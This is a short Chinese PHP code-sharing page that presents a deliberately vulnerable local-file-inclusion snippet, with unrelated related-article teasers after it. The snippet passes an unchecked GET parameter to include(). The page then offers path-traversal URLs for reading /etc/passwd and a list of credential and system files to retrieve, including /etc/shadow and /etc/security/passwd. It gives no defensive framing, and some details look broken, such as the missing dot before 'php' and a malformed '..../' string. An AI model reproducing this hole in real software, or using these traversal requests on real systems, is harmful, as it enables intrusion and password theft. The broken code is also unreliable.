php 伪造本地文件包含漏洞的代码

yipeiwu_com7年前PHP代码库
代码:
复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

相关文章

PHP使用正则表达式实现过滤非法字符串功能示例

PHP使用正则表达式实现过滤非法字符串功能示例

本文实例讲述了PHP使用正则表达式实现过滤非法字符串功能。分享给大家供大家参考,具体如下: 一、代码 1、index.php <!DOCTYPE html PUBLIC "-/...

php实现获取文章内容第一张图片的方法

本文实例讲述了php实现获取文章内容第一张图片的方法。分享给大家供大家参考。具体分析如下: 采用php获取文章内容的第一张图片方法非常的简单,我们最常用的是使用正则了,感兴趣的朋友可以参...

如何提高PHP速度第1/3页

简单的数据缓存技术    近来做了一阵子程序性能的优化工作,有个比较有意思的想法,想提出来和大家交流一下。    Cache是“以空间换时间”策略的典型应用模式,是提...

php关联数组与索引数组及其显示方法

数据 username password test 123456 关联数组: mysql_fetch_assoc() array([username]=>'test...

PHP实现多进程并行操作的详解(可做守护进程)

如下所示:复制代码 代码如下:/** * 入口函数 * 将此文件保存为 ProcessOpera.php * 在terminal中运行 /usr/local...